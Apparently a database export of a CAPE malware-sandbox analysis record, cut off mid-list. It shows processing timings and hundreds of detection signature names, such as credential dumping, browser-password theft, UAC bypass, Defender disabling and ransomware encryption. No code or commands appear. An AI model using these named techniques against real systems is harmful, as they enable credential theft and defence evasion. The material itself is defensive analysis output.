| _id | statistics | target | CAPE | info | behavior | debug | network | url_analysis | procmemory | signatures | malscore | ttps | malstatus | md5 | sha256 | task_id | timestamp | has_report | report_cache_hash |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
691862880999409cf96ec55b
|
{
"processing": [
{
"name": "CAPE",
"time": 0.9
},
{
"name": "AnalysisInfo",
"time": 0.011
},
{
"name": "BehaviorAnalysis",
"time": 0.007
},
{
"name": "Debug",
"time": 0.001
},
{
"name": "NetworkAnalysis",
"time": 14.436
},
{
"name": "UrlAnalysis",
"time": 0
},
{
"name": "script_log_processing",
"time": 0
},
{
"name": "ProcessMemory",
"time": 0
}
],
"signatures": [
{
"name": "packer_themida",
"time": 0
},
{
"name": "stealth_network",
"time": 0
},
{
"name": "disable_driver_via_blocklist",
"time": 0
},
{
"name": "disable_driver_via_hvcidisallowedimages",
"time": 0
},
{
"name": "disable_hypervisor_protected_code_integrity",
"time": 0
},
{
"name": "pendingfilerenameoperations_Operations",
"time": 0
},
{
"name": "anomalous_deletefile",
"time": 0
},
{
"name": "antiav_360_libs",
"time": 0
},
{
"name": "antiav_ahnlab_libs",
"time": 0
},
{
"name": "antiav_avast_libs",
"time": 0
},
{
"name": "antiav_bitdefender_libs",
"time": 0
},
{
"name": "antiav_bullgaurd_libs",
"time": 0
},
{
"name": "antiav_emsisoft_libs",
"time": 0
},
{
"name": "antiav_qurb_libs",
"time": 0
},
{
"name": "antiav_servicestop",
"time": 0
},
{
"name": "antiav_apioverride_libs",
"time": 0
},
{
"name": "antidebug_guardpages",
"time": 0
},
{
"name": "antiav_nthookengine_libs",
"time": 0
},
{
"name": "antidebug_outputdebugstring",
"time": 0
},
{
"name": "antidebug_windows",
"time": 0
},
{
"name": "antisandbox_cuckoo",
"time": 0
},
{
"name": "antisandbox_cuckoocrash",
"time": 0
},
{
"name": "antisandbox_foregroundwindows",
"time": 0
},
{
"name": "mouse_movement_detect",
"time": 0
},
{
"name": "antisandbox_sboxie_libs",
"time": 0
},
{
"name": "antisandbox_script_timer",
"time": 0
},
{
"name": "antisandbox_sleep",
"time": 0
},
{
"name": "antisandbox_sunbelt_libs",
"time": 0
},
{
"name": "antisandbox_unhook",
"time": 0
},
{
"name": "antivm_directory_objects",
"time": 0
},
{
"name": "antivm_generic_disk",
"time": 0
},
{
"name": "antivm_generic_system",
"time": 0
},
{
"name": "antivm_checks_available_memory",
"time": 0
},
{
"name": "detect_virtualization_via_recent_files",
"time": 0
},
{
"name": "antivm_vbox_libs",
"time": 0
},
{
"name": "antivm_vmware_events",
"time": 0
},
{
"name": "antivm_vmware_libs",
"time": 0
},
{
"name": "api_spamming",
"time": 0
},
{
"name": "api_uuidfromstringa",
"time": 0
},
{
"name": "bcdedit_command",
"time": 0
},
{
"name": "bootkit",
"time": 0
},
{
"name": "potential_overwrite_mbr",
"time": 0
},
{
"name": "suspicious_ioctl_scsipassthough",
"time": 0
},
{
"name": "suspicious_iocontrol_codes",
"time": 0
},
{
"name": "browser_needed",
"time": 0
},
{
"name": "regsvr32_squiblydoo_dll_load",
"time": 0
},
{
"name": "uac_bypass_cmstp",
"time": 0
},
{
"name": "uac_bypass_eventvwr",
"time": 0
},
{
"name": "uac_bypass_windows_Backup",
"time": 0
},
{
"name": "dotnet_code_compile",
"time": 0
},
{
"name": "queries_computer_name",
"time": 0
},
{
"name": "queries_user_name",
"time": 0
},
{
"name": "creates_largekey",
"time": 0
},
{
"name": "creates_nullvalue",
"time": 0
},
{
"name": "access_windows_passwords_vault",
"time": 0
},
{
"name": "lsass_credential_dumping",
"time": 0
},
{
"name": "critical_process",
"time": 0
},
{
"name": "cryptopool_domains",
"time": 0
},
{
"name": "dead_connect",
"time": 0
},
{
"name": "dead_link",
"time": 0
},
{
"name": "decoy_document",
"time": 0
},
{
"name": "decoy_image",
"time": 0
},
{
"name": "deletes_consolehost_history",
"time": 0
},
{
"name": "dep_bypass",
"time": 0
},
{
"name": "dep_disable",
"time": 0
},
{
"name": "disables_wfp",
"time": 0
},
{
"name": "add_windows_defender_exclusions",
"time": 0
},
{
"name": "dll_load_uncommon_file_types",
"time": 0
},
{
"name": "document_script_exe_drop",
"time": 0
},
{
"name": "guloader_apis",
"time": 0
},
{
"name": "driver_load",
"time": 0
},
{
"name": "dynamic_function_loading",
"time": 0
},
{
"name": "encrypted_ioc",
"time": 0
},
{
"name": "exec_crash",
"time": 0
},
{
"name": "process_creation_suspicious_location",
"time": 0
},
{
"name": "exploit_getbasekerneladdress",
"time": 0
},
{
"name": "exploit_gethaldispatchtable",
"time": 0
},
{
"name": "exploit_heapspray",
"time": 0
},
{
"name": "koadic_apis",
"time": 0
},
{
"name": "koadic_network_activity",
"time": 0
},
{
"name": "downloads_from_filehosting",
"time": 0
},
{
"name": "generic_phish",
"time": 0
},
{
"name": "http_request",
"time": 0
},
{
"name": "infostealer_browser",
"time": 0
},
{
"name": "infostealer_browser_password",
"time": 0
},
{
"name": "infostealer_cookies",
"time": 0
},
{
"name": "cryptbot_network",
"time": 0
},
{
"name": "purplewave_network_activity",
"time": 0
},
{
"name": "quilclipper_behavior",
"time": 0
},
{
"name": "raccoon_behavior",
"time": 0
},
{
"name": "captures_screenshot",
"time": 0
},
{
"name": "vidar_behavior",
"time": 0
},
{
"name": "injection_createremotethread",
"time": 0
},
{
"name": "injection_explorer",
"time": 0
},
{
"name": "injection_network_traffic",
"time": 0
},
{
"name": "injection_runpe",
"time": 0
},
{
"name": "injection_rwx",
"time": 0
},
{
"name": "injection_themeinitapihook",
"time": 0
},
{
"name": "resumethread_remote_process",
"time": 0
},
{
"name": "injection_write_exe_process",
"time": 0
},
{
"name": "injection_write_process",
"time": 0
},
{
"name": "internet_dropper",
"time": 0
},
{
"name": "escalate_privilege_via_named_pipe",
"time": 0
},
{
"name": "ipc_namedpipe",
"time": 0
},
{
"name": "js_phish",
"time": 0
},
{
"name": "js_suspicious_redirect",
"time": 0
},
{
"name": "loader_alien",
"time": 0
},
{
"name": "execute_binary_via_internet_explorer_exporter",
"time": 0
},
{
"name": "execute_binary_via_run_exe_helper_utility",
"time": 0
},
{
"name": "execute_ps_via_syncappvpublishingserver",
"time": 0
},
{
"name": "malicious_dynamic_function_loading",
"time": 0
},
{
"name": "encrypt_pcinfo",
"time": 0
},
{
"name": "encrypt_data_agenttesla_http",
"time": 0
},
{
"name": "encrypt_data_agentteslat2_http",
"time": 0
},
{
"name": "encrypt_data_nanocore",
"time": 0
},
{
"name": "reads_memory_remote_process",
"time": 0
},
{
"name": "mimics_filetime",
"time": 0
},
{
"name": "amsi_bypass_via_com_registry",
"time": 0
},
{
"name": "access_auto_logons_via_registry",
"time": 0
},
{
"name": "access_boot_key_via_registry",
"time": 0
},
{
"name": "create_suspicious_lnk_files",
"time": 0
},
{
"name": "credential_access_via_windows_credential_history",
"time": 0
},
{
"name": "dll_hijacking_via_microsoft_exchange",
"time": 0
},
{
"name": "dll_hijacking_via_waas_medic_svc_com_typelib",
"time": 0
},
{
"name": "execute_file_downloaded_via_openssh",
"time": 0
},
{
"name": "execute_safe_mode_from_suspicious_process",
"time": 0
},
{
"name": "execute_scripts_via_microsoft_management_console",
"time": 0
},
{
"name": "execute_suspicious_processes_via_windows_mssql_service",
"time": 0
},
{
"name": "execution_from_self_extracting_archive",
"time": 0
},
{
"name": "ip_address_discovery_via_trusted_program",
"time": 0
},
{
"name": "load_dll_via_control_panel",
"time": 0
},
{
"name": "network_connection_via_suspicious_process",
"time": 0
},
{
"name": "potential_location_discovery_via_unusual_process",
"time": 0
},
{
"name": "store_executable_registry",
"time": 0
},
{
"name": "Suspicious_Execution_Via_MicrosoftExchangeTransportAgent",
"time": 0
},
{
"name": "suspicious_java_execution_via_win_scripts",
"time": 0
},
{
"name": "Suspicious_Scheduled_Task_Creation_Via_Masqueraded_XML_File",
"time": 0
},
{
"name": "uses_restart_manager_for_suspicious_activities",
"time": 0
},
{
"name": "modify_desktop_wallpaper",
"time": 0
},
{
"name": "move_file_on_reboot",
"time": 0
},
{
"name": "multiple_useragents",
"time": 0
},
{
"name": "network_anomaly",
"time": 0
},
{
"name": "network_bind",
"time": 0
},
{
"name": "network_cnc_https_archive",
"time": 0
},
{
"name": "network_cnc_https_free_webshoting",
"time": 0
},
{
"name": "network_cnc_https_generic",
"time": 0
},
{
"name": "network_cnc_https_temp_urldns",
"time": 0
},
{
"name": "network_cnc_https_opensource",
"time": 0
},
{
"name": "network_cnc_https_pastesite",
"time": 0
},
{
"name": "network_cnc_https_payload",
"time": 0
},
{
"name": "network_cnc_https_serviceinterface",
"time": 0
},
{
"name": "network_cnc_https_socialmedia",
"time": 0
},
{
"name": "network_cnc_https_telegram",
"time": 0
},
{
"name": "network_cnc_https_tempstorage",
"time": 0
},
{
"name": "network_cnc_https_urlshortener",
"time": 0
},
{
"name": "network_cnc_https_useragent",
"time": 0
},
{
"name": "network_cnc_smtps_exfil",
"time": 0
},
{
"name": "network_cnc_smtps_generic",
"time": 0
},
{
"name": "network_dns_idn",
"time": 0
},
{
"name": "network_dns_suspicious_querytype",
"time": 0
},
{
"name": "network_dns_tunneling_request",
"time": 0
},
{
"name": "network_document_http",
"time": 0
},
{
"name": "explorer_http",
"time": 0
},
{
"name": "network_fake_useragent",
"time": 0
},
{
"name": "legitimate_domain_abuse",
"time": 0
},
{
"name": "suspicious_communication_trusted_site",
"time": 0
},
{
"name": "network_tor",
"time": 0
},
{
"name": "office_com_load",
"time": 0
},
{
"name": "office_dotnet_load",
"time": 0
},
{
"name": "office_mshtml_load",
"time": 0
},
{
"name": "office_vb_load",
"time": 0
},
{
"name": "office_wmi_load",
"time": 0
},
{
"name": "office_cve2017_11882",
"time": 0
},
{
"name": "office_cve2017_11882_network",
"time": 0
},
{
"name": "office_cve_2021_40444",
"time": 0
},
{
"name": "office_cve_2021_40444_m2",
"time": 0
},
{
"name": "office_flash_load",
"time": 0
},
{
"name": "office_postscript",
"time": 0
},
{
"name": "office_suspicious_processes",
"time": 0
},
{
"name": "office_write_exe",
"time": 0
},
{
"name": "persistence_via_autodial_dll_registry",
"time": 0
},
{
"name": "persistence_autorun",
"time": 0
},
{
"name": "persistence_autorun_tasks",
"time": 0
},
{
"name": "persistence_bootexecute",
"time": 0
},
{
"name": "persistence_registry_script",
"time": 0
},
{
"name": "powershell_network_connection",
"time": 0
},
{
"name": "powershell_download",
"time": 0
},
{
"name": "powershell_request",
"time": 0
},
{
"name": "createtoolhelp32snapshot_module_enumeration",
"time": 0
},
{
"name": "enumerates_running_processes",
"time": 0
},
{
"name": "process_interest",
"time": 0
},
{
"name": "process_needed",
"time": 0
},
{
"name": "mass_data_encryption",
"time": 0
},
{
"name": "ransomware_file_modifications",
"time": 0
},
{
"name": "nemty_network_activity",
"time": 0
},
{
"name": "nemty_note",
"time": 0
},
{
"name": "sodinokibi_behavior",
"time": 0
},
{
"name": "stop_ransomware_registry",
"time": 0
},
{
"name": "blackrat_apis",
"time": 0
},
{
"name": "blackrat_network_activity",
"time": 0
},
{
"name": "blackrat_registry_keys",
"time": 0
},
{
"name": "dcrat_behavior",
"time": 0
},
{
"name": "karagany_system_event_objects",
"time": 0
},
{
"name": "rat_luminosity",
"time": 0
},
{
"name": "rat_nanocore",
"time": 0
},
{
"name": "netwire_behavior",
"time": 0
},
{
"name": "obliquerat_network_activity",
"time": 0
},
{
"name": "orcusrat_behavior",
"time": 0
},
{
"name": "trochilusrat_apis",
"time": 0
},
{
"name": "reads_self",
"time": 0
},
{
"name": "recon_beacon",
"time": 0
},
{
"name": "recon_programs",
"time": 0
},
{
"name": "recon_systeminfo",
"time": 0
},
{
"name": "accesses_recyclebin",
"time": 0
},
{
"name": "remcos_shell_code_dynamic_wrapper_x",
"time": 0
},
{
"name": "script_created_process",
"time": 0
},
{
"name": "script_network_activity",
"time": 0
},
{
"name": "suspicious_js_script",
"time": 0
},
{
"name": "javascript_timer",
"time": 0
},
{
"name": "secure_login_phishing",
"time": 0
},
{
"name": "securityxploded_modules",
"time": 0
},
{
"name": "get_clipboard_data",
"time": 0
},
{
"name": "sets_autoconfig_url",
"time": 0
},
{
"name": "spoofs_procname",
"time": 0
},
{
"name": "stack_pivot",
"time": 0
},
{
"name": "stack_pivot_file_created",
"time": 0
},
{
"name": "stack_pivot_process_create",
"time": 0
},
{
"name": "set_clipboard_data",
"time": 0
},
{
"name": "stealth_childproc",
"time": 0
},
{
"name": "stealth_file",
"time": 0
},
{
"name": "stealth_timeout",
"time": 0
},
{
"name": "stealth_window",
"time": 0
},
{
"name": "queries_keyboard_layout",
"time": 0
},
{
"name": "queries_locale_api",
"time": 0
},
{
"name": "terminates_remote_process",
"time": 0
},
{
"name": "uiautomationcore_load",
"time": 0
},
{
"name": "user_enum",
"time": 0
},
{
"name": "virus",
"time": 0
},
{
"name": "neshta_files",
"time": 0
},
{
"name": "neshta_regkeys",
"time": 0
},
{
"name": "webmail_phish",
"time": 0
},
{
"name": "persists_dev_util",
"time": 0
},
{
"name": "spawns_dev_util",
"time": 0
},
{
"name": "alters_windows_utility",
"time": 0
},
{
"name": "overwrites_accessibility_utility",
"time": 0
},
{
"name": "Potential_Lateral_Movement_Via_SMBEXEC",
"time": 0
},
{
"name": "potential_WebShell_Via_ScreenConnectServer",
"time": 0
},
{
"name": "uses_Microsoft_HTML_Help_Executable",
"time": 0
},
{
"name": "wiper_zeroedbytes",
"time": 0
},
{
"name": "wmi_create_process",
"time": 0
},
{
"name": "wmi_script_process",
"time": 0
},
{
"name": "antianalysis_tls_section",
"time": 0
},
{
"name": "antivirus_clamav",
"time": 0
},
{
"name": "antivirus_virustotal",
"time": 0
},
{
"name": "bad_certs",
"time": 0
},
{
"name": "bad_ssl_certs",
"time": 0
},
{
"name": "banker_zeus_p2p",
"time": 0
},
{
"name": "banker_zeus_url",
"time": 0
},
{
"name": "binary_yara",
"time": 0
},
{
"name": "bot_athenahttp",
"time": 0
},
{
"name": "bot_dirtjumper",
"time": 0
},
{
"name": "bot_drive",
"time": 0
},
{
"name": "bot_drive2",
"time": 0
},
{
"name": "bot_madness",
"time": 0
},
{
"name": "phishing_kit_detected",
"time": 0
},
{
"name": "family_proxyback",
"time": 0
},
{
"name": "flare_capa_antianalysis",
"time": 0
},
{
"name": "flare_capa_collection",
"time": 0
},
{
"name": "flare_capa_communication",
"time": 0
},
{
"name": "flare_capa_compiler",
"time": 0
},
{
"name": "flare_capa_datamanipulation",
"time": 0
},
{
"name": "flare_capa_executable",
"time": 0
},
{
"name": "flare_capa_hostinteraction",
"time": 0
},
{
"name": "flare_capa_impact",
"time": 0
},
{
"name": "flare_capa_lib",
"time": 0
},
{
"name": "flare_capa_linking",
"time": 0
},
{
"name": "flare_capa_loadcode",
"time": 0
},
{
"name": "flare_capa_malwarefamily",
"time": 0
},
{
"name": "flare_capa_nursery",
"time": 0
},
{
"name": "flare_capa_persistence",
"time": 0
},
{
"name": "flare_capa_runtime",
"time": 0
},
{
"name": "flare_capa_targeting",
"time": 0
},
{
"name": "threatfox",
"time": 0
},
{
"name": "log4shell",
"time": 0
},
{
"name": "mimics_extension",
"time": 0
},
{
"name": "network_country_distribution",
"time": 0
},
{
"name": "network_cnc_http",
"time": 0.006
},
{
"name": "network_ip_exe",
"time": 0.001
},
{
"name": "network_dga",
"time": 0
},
{
"name": "network_dga_fraunhofer",
"time": 0
},
{
"name": "network_dyndns",
"time": 0
},
{
"name": "network_excessive_udp",
"time": 0
},
{
"name": "network_http",
"time": 0.002
},
{
"name": "network_icmp",
"time": 0
},
{
"name": "network_irc",
"time": 0
},
{
"name": "network_open_proxy",
"time": 0
},
{
"name": "network_questionable_http_path",
"time": 0
},
{
"name": "network_questionable_https_path",
"time": 0
},
{
"name": "network_smtp",
"time": 0
},
{
"name": "network_torgateway",
"time": 0
},
{
"name": "origin_langid",
"time": 0
},
{
"name": "origin_resource_langid",
"time": 0
},
{
"name": "overlay",
"time": 0
},
{
"name": "packer_unknown_pe_section_name",
"time": 0
},
{
"name": "packer_aspack",
"time": 0
},
{
"name": "packer_aspirecrypt",
"time": 0
},
{
"name": "packer_bedsprotector",
"time": 0
},
{
"name": "packer_confuser",
"time": 0
},
{
"name": "packer_enigma",
"time": 0
},
{
"name": "packer_entropy",
"time": 0
},
{
"name": "packer_mpress",
"time": 0
},
{
"name": "packer_nate",
"time": 0
},
{
"name": "packer_nspack",
"time": 0
},
{
"name": "packer_smartassembly",
"time": 0
},
{
"name": "packer_spices",
"time": 0
},
{
"name": "packer_themida",
"time": 0
},
{
"name": "packer_titan",
"time": 0
},
{
"name": "packer_upx",
"time": 0
},
{
"name": "packer_vmprotect",
"time": 0
},
{
"name": "packer_yoda",
"time": 0
},
{
"name": "pdf_annot_urls_checker",
"time": 0
},
{
"name": "polymorphic",
"time": 0
},
{
"name": "punch_plus_plus_pcres",
"time": 0
},
{
"name": "procmem_yara",
"time": 0
},
{
"name": "recon_checkip",
"time": 0
},
{
"name": "static_authenticode",
"time": 0
},
{
"name": "invalid_authenticode_signature",
"time": 0
},
{
"name": "static_dotnet_anomaly",
"time": 0
},
{
"name": "static_java",
"time": 0
},
{
"name": "static_pdf",
"time": 0
},
{
"name": "contains_pe_overlay",
"time": 0
},
{
"name": "static_pe_anomaly",
"time": 0
},
{
"name": "pe_compile_timestomping",
"time": 0
},
{
"name": "static_pe_pdbpath",
"time": 0
},
{
"name": "static_rat_config",
"time": 0
},
{
"name": "static_versioninfo_anomaly",
"time": 0
},
{
"name": "suricata_alert",
"time": 0
},
{
"name": "suspicious_html_body",
"time": 0
},
{
"name": "suspicious_html_name",
"time": 0
},
{
"name": "suspicious_html_title",
"time": 0
},
{
"name": "volatility_devicetree_1",
"time": 0
},
{
"name": "volatility_handles_1",
"time": 0
},
{
"name": "volatility_ldrmodules_1",
"time": 0
},
{
"name": "volatility_ldrmodules_2",
"time": 0
},
{
"name": "volatility_malfind_1",
"time": 0
},
{
"name": "volatility_malfind_2",
"time": 0
},
{
"name": "volatility_modscan_1",
"time": 0
},
{
"name": "volatility_svcscan_1",
"time": 0
},
{
"name": "volatility_svcscan_2",
"time": 0
},
{
"name": "volatility_svcscan_3",
"time": 0
},
{
"name": "whois_create",
"time": 0
},
{
"name": "accesses_mailslot",
"time": 0
},
{
"name": "accesses_netlogon_regkey",
"time": 0
},
{
"name": "accesses_public_folder",
"time": 0
},
{
"name": "accesses_sysvol",
"time": 0
},
{
"name": "writes_sysvol",
"time": 0
},
{
"name": "adds_admin_user",
"time": 0
},
{
"name": "adds_user",
"time": 0
},
{
"name": "overwrites_admin_password",
"time": 0
},
{
"name": "antianalysis_detectfile",
"time": 0.001
},
{
"name": "antianalysis_detectreg",
"time": 0
},
{
"name": "modify_attachment_manager",
"time": 0
},
{
"name": "antiav_detectfile",
"time": 0.001
},
{
"name": "antiav_detectreg",
"time": 0.002
},
{
"name": "antiav_srp",
"time": 0
},
{
"name": "antiav_whitespace",
"time": 0
},
{
"name": "antidebug_devices",
"time": 0
},
{
"name": "antiemu_windefend",
"time": 0
},
{
"name": "antiemu_wine_reg",
"time": 0
},
{
"name": "antisandbox_cuckoo_files",
"time": 0
},
{
"name": "antisandbox_fortinet_files",
"time": 0
},
{
"name": "antisandbox_joe_anubis_files",
"time": 0
},
{
"name": "antisandbox_sboxie_mutex",
"time": 0
},
{
"name": "antisandbox_sunbelt_files",
"time": 0
},
{
"name": "antisandbox_threattrack_files",
"time": 0
},
{
"name": "antivm_bochs_keys",
"time": 0
},
{
"name": "antivm_generic_bios",
"time": 0
},
{
"name": "antivm_generic_diskreg",
"time": 0
},
{
"name": "antivm_hyperv_keys",
"time": 0
},
{
"name": "antivm_parallels_keys",
"time": 0
},
{
"name": "antivm_recentdocs",
"time": 0
},
{
"name": "antivm_vbox_devices",
"time": 0
},
{
"name": "antivm_vbox_files",
"time": 0
},
{
"name": "antivm_vbox_keys",
"time": 0
},
{
"name": "antivm_vmware_devices",
"time": 0
},
{
"name": "antivm_vmware_files",
"time": 0
},
{
"name": "antivm_vmware_keys",
"time": 0
},
{
"name": "antivm_vmware_mutexes",
"time": 0
},
{
"name": "antivm_vpc_files",
"time": 0
},
{
"name": "antivm_vpc_keys",
"time": 0
},
{
"name": "antivm_vpc_mutex",
"time": 0
},
{
"name": "antivm_xen_keys",
"time": 0
},
{
"name": "asyncrat_mutex",
"time": 0
},
{
"name": "gulpix_behavior",
"time": 0
},
{
"name": "ketrican_regkeys",
"time": 0
},
{
"name": "okrum_mutexes",
"time": 0
},
{
"name": "banker_cridex",
"time": 0
},
{
"name": "geodo_banking_trojan",
"time": 0
},
{
"name": "banker_spyeye_mutexes",
"time": 0
},
{
"name": "banker_zeus_mutex",
"time": 0
},
{
"name": "bitcoin_opencl",
"time": 0
},
{
"name": "accesses_primary_patition",
"time": 0
},
{
"name": "direct_hdd_access",
"time": 0
},
{
"name": "enumerates_physical_drives",
"time": 0
},
{
"name": "physical_drive_access",
"time": 0
},
{
"name": "bot_russkill",
"time": 0
},
{
"name": "browser_addon",
"time": 0
},
{
"name": "chromium_browser_extension_directory",
"time": 0
},
{
"name": "browser_helper_object",
"time": 0
},
{
"name": "browser_security",
"time": 0
},
{
"name": "browser_startpage",
"time": 0
},
{
"name": "ie_disables_process_tab",
"time": 0
},
{
"name": "odbcconf_bypass",
"time": 0
},
{
"name": "squiblydoo_bypass",
"time": 0
},
{
"name": "squiblytwo_bypass",
"time": 0
},
{
"name": "bypass_chromium_protection",
"time": 0
},
{
"name": "bypass_firewall",
"time": 0
},
{
"name": "checks_uac_status",
"time": 0
},
{
"name": "uac_bypass_cmstpcom",
"time": 0
},
{
"name": "uac_bypass_delegateexecute_sdclt",
"time": 0
},
{
"name": "uac_bypass_fodhelper",
"time": 0
},
{
"name": "cape_extracted_content",
"time": 0
},
{
"name": "carberp_mutex",
"time": 0
},
{
"name": "clears_logs",
"time": 0
},
{
"name": "cmdline_obfuscation",
"time": 0
},
{
"name": "cmdline_switches",
"time": 0
},
{
"name": "cmdline_terminate",
"time": 0
},
{
"name": "cmdline_forfiles_wildcard",
"time": 0
},
{
"name": "cmdline_http_link",
"time": 0
},
{
"name": "cmdline_long_string",
"time": 0
},
{
"name": "cmdline_reversed_http_link",
"time": 0
},
{
"name": "long_commandline",
"time": 0
},
{
"name": "powershell_renamed_commandline",
"time": 0
},
{
"name": "copies_self",
"time": 0
},
{
"name": "credwiz_credentialaccess",
"time": 0
},
{
"name": "enables_wdigest",
"time": 0
},
{
"name": "vaultcmd_credentialaccess",
"time": 0
},
{
"name": "file_credential_store_access",
"time": 0
},
{
"name": "file_credential_store_write",
"time": 0
},
{
"name": "kerberos_credential_access_via_rubeus",
"time": 0
},
{
"name": "registry_credential_dumping",
"time": 0
},
{
"name": "registry_credential_store_access",
"time": 0
},
{
"name": "registry_lsa_secrets_access",
"time": 0
},
{
"name": "comsvcs_credentialdump",
"time": 0
},
{
"name": "cryptomining_stratum_command",
"time": 0
},
{
"name": "cypherit_mutexes",
"time": 0
},
{
"name": "darkcomet_regkeys",
"time": 0
},
{
"name": "datop_loader",
"time": 0
},
{
"name": "deepfreeze_mutex",
"time": 0
},
{
"name": "deletes_executed_files",
"time": 0
},
{
"name": "disables_app_launch",
"time": 0
},
{
"name": "disables_auto_app_termination",
"time": 0
},
{
"name": "disables_appv_virtualization",
"time": 0
},
{
"name": "disables_backups",
"time": 0
},
{
"name": "disables_browser_warn",
"time": 0
},
{
"name": "disables_context_menus",
"time": 0
},
{
"name": "disables_cpl_disable",
"time": 0
},
{
"name": "disables_crashdumps",
"time": 0
},
{
"name": "disables_event_logging",
"time": 0
},
{
"name": "disables_folder_options",
"time": 0
},
{
"name": "disables_notificationcenter",
"time": 0
},
{
"name": "disables_power_options",
"time": 0
},
{
"name": "disables_restore_default_state",
"time": 0
},
{
"name": "disables_run_command",
"time": 0
},
{
"name": "disables_smartscreen",
"time": 0
},
{
"name": "disables_startmenu_search",
"time": 0
},
{
"name": "disables_system_restore",
"time": 0
},
{
"name": "disables_uac",
"time": 0
},
{
"name": "disables_wer",
"time": 0
},
{
"name": "disables_windows_defender",
"time": 0
},
{
"name": "disables_windows_defender_logging",
"time": 0
},
{
"name": "removes_windows_defender_contextmenu",
"time": 0
},
{
"name": "removes_windows_defender_updates",
"time": 0
},
{
"name": "windows_defender_powershell",
"time": 0
},
{
"name": "disables_windows_file_protection",
"time": 0
},
{
"name": "disables_windowsupdate",
"time": 0
},
{
"name": "disables_winfirewall",
"time": 0
},
{
"name": "adfind_domain_enumeration",
"time": 0
},
{
"name": "domain_enumeration_commands",
"time": 0
},
{
"name": "andromut_mutexes",
"time": 0
},
{
"name": "downloader_cabby",
"time": 0
},
{
"name": "phorpiex_mutexes",
"time": 0
},
{
"name": "protonbot_mutexes",
"time": 0
},
{
"name": "driver_filtermanager",
"time": 0
},
{
"name": "dropper",
"time": 0
},
{
"name": "dll_archive_execution",
"time": 0
},
{
"name": "lnk_archive_execution",
"time": 0
},
{
"name": "script_archive_execution",
"time": 0
},
{
"name": "excel4_macro_urls",
"time": 0
},
{
"name": "escalate_privilege_via_ntlm_relay",
"time": 0
},
{
"name": "spooler_access",
"time": 0
},
{
"name": "spooler_svc_start",
"time": 0
},
{
"name": "mapped_drives_uac",
"time": 0
},
{
"name": "hides_recycle_bin_icon",
"time": 0
},
{
"name": "apocalypse_stealer_file_behavior",
"time": 0
},
{
"name": "arkei_files",
"time": 0
},
{
"name": "azorult_mutexes",
"time": 0
},
{
"name": "infostealer_bitcoin",
"time": 0.001
},
{
"name": "cryptbot_files",
"time": 0
},
{
"name": "echelon_files",
"time": 0
},
{
"name": "infostealer_ftp",
"time": 0.001
},
{
"name": "infostealer_im",
"time": 0.001
},
{
"name": "infostealer_mail",
"time": 0
},
{
"name": "masslogger_files",
"time": 0
},
{
"name": "poullight_files",
"time": 0
},
{
"name": "purplewave_mutexes",
"time": 0
},
{
"name": "quilclipper_mutexes",
"time": 0
},
{
"name": "qulab_files",
"time": 0
},
{
"name": "qulab_mutexes",
"time": 0
},
{
"name": "asyncrat_mutex",
"time": 0
},
{
"name": "Evade_Execution_Via_ASPNet_Compiler",
"time": 0
},
{
"name": "Evade_Execute_Via_DeviceCredentialDeployment",
"time": 0
},
{
"name": "Evade_Execution_Via_Filter_Manager_Control",
"time": 0
},
{
"name": "Evade_Execution_Via_Intel_GFXDownloadWrapper",
"time": 0
},
{
"name": "execute_binary_via_appvlp",
"time": 0
},
{
"name": "execute_binary_via_pcalua",
"time": 0
},
{
"name": "Execute_Binary_Via_OpenSSH",
"time": 0
},
{
"name": "execute_binary_via_pcalua",
"time": 0
},
{
"name": "Execute_Binary_Via_PesterPSModule",
"time": 0
},
{
"name": "Execute_Binary_Via_ScriptRunner",
"time": 0
},
{
"name": "execute_binary_via_ttdinject",
"time": 0
},
{
"name": "Execute_Binary_Via_VisualStudioLiveShare",
"time": 0
},
{
"name": "Execute_Msiexec_Via_Explorer",
"time": 0
},
{
"name": "execute_remote_msi",
"time": 0
},
{
"name": "execute_suspicious_powershell_via_runscripthelper",
"time": 0
},
{
"name": "execute_suspicious_powershell_via_sqlps",
"time": 0
},
{
"name": "Indirect_Command_Execution_Via_ConsoleWindowHost",
"time": 0
},
{
"name": "Perform_Malicious_Activities_Via_Headless_Browser",
"time": 0
},
{
"name": "Register_DLL_Via_CertOC",
"time": 0
},
{
"name": "Register_DLL_Via_MSIEXEC",
"time": 0
},
{
"name": "Register_DLL_Via_Odbcconf",
"time": 0
},
{
"name": "Scriptlet_Proxy_Execution_Via_Pubprn",
"time": 0
},
{
"name": "ie_martian_children",
"time": 0
},
{
"name": "office_martian_children",
"time": 0
},
{
"name": "mimics_icon",
"time": 0
},
{
"name": "masquerade_process_name",
"time": 0.001
},
{
"name": "mimikatz_modules",
"time": 0
},
{
"name": "ms_office_cmd_rce",
"time": 0
},
{
"name": "mount_copy_to_webdav_share",
"time": 0
},
{
"name": "potential_protocol_tunneling_via_legit_utilities",
"time": 0
},
{
"name": "potential_protocol_tunneling_via_qemu",
"time": 0
},
{
"name": "suspicious_execution_via_dotnet_remoting",
"time": 0
},
{
"name": "modify_certs",
"time": 0
},
{
"name": "dotnet_clr_usagelog_regkeys",
"time": 0
},
{
"name": "modify_hostfile",
"time": 0
},
{
"name": "modify_oem_information",
"time": 0
},
{
"name": "modify_security_center_warnings",
"time": 0
},
{
"name": "modify_uac_prompt",
"time": 0
},
{
"name": "network_dns_blockchain",
"time": 0
},
{
"name": "network_dns_opennic",
"time": 0
},
{
"name": "network_dns_paste_site",
"time": 0
},
{
"name": "network_dns_reverse_proxy",
"time": 0
},
{
"name": "network_dns_temp_file_storage",
"time": 0
},
{
"name": "network_dns_temp_urldns",
"time": 0
},
{
"name": "network_dns_url_shortener",
"time": 0
},
{
"name": "network_dns_doh_tls",
"time": 0
},
{
"name": "suspicious_tld",
"time": 0
},
{
"name": "network_tor_service",
"time": 0
},
{
"name": "office_code_page",
"time": 0
},
{
"name": "office_addinloading",
"time": 0
},
{
"name": "office_perfkey",
"time": 0
},
{
"name": "office_macro",
"time": 0
},
{
"name": "changes_trust_center_settings",
"time": 0
},
{
"name": "disables_vba_trust_access",
"time": 0
},
{
"name": "office_macro_autoexecution",
"time": 0
},
{
"name": "office_macro_ioc",
"time": 0
},
{
"name": "office_macro_malicious_prediction",
"time": 0
},
{
"name": "office_macro_suspicious",
"time": 0
},
{
"name": "rtf_aslr_bypass",
"time": 0
},
{
"name": "rtf_anomaly_characterset",
"time": 0
},
{
"name": "rtf_anomaly_version",
"time": 0
},
{
"name": "rtf_embedded_content",
"time": 0
},
{
"name": "rtf_embedded_office_file",
"time": 0
},
{
"name": "rtf_exploit_static",
"time": 0
},
{
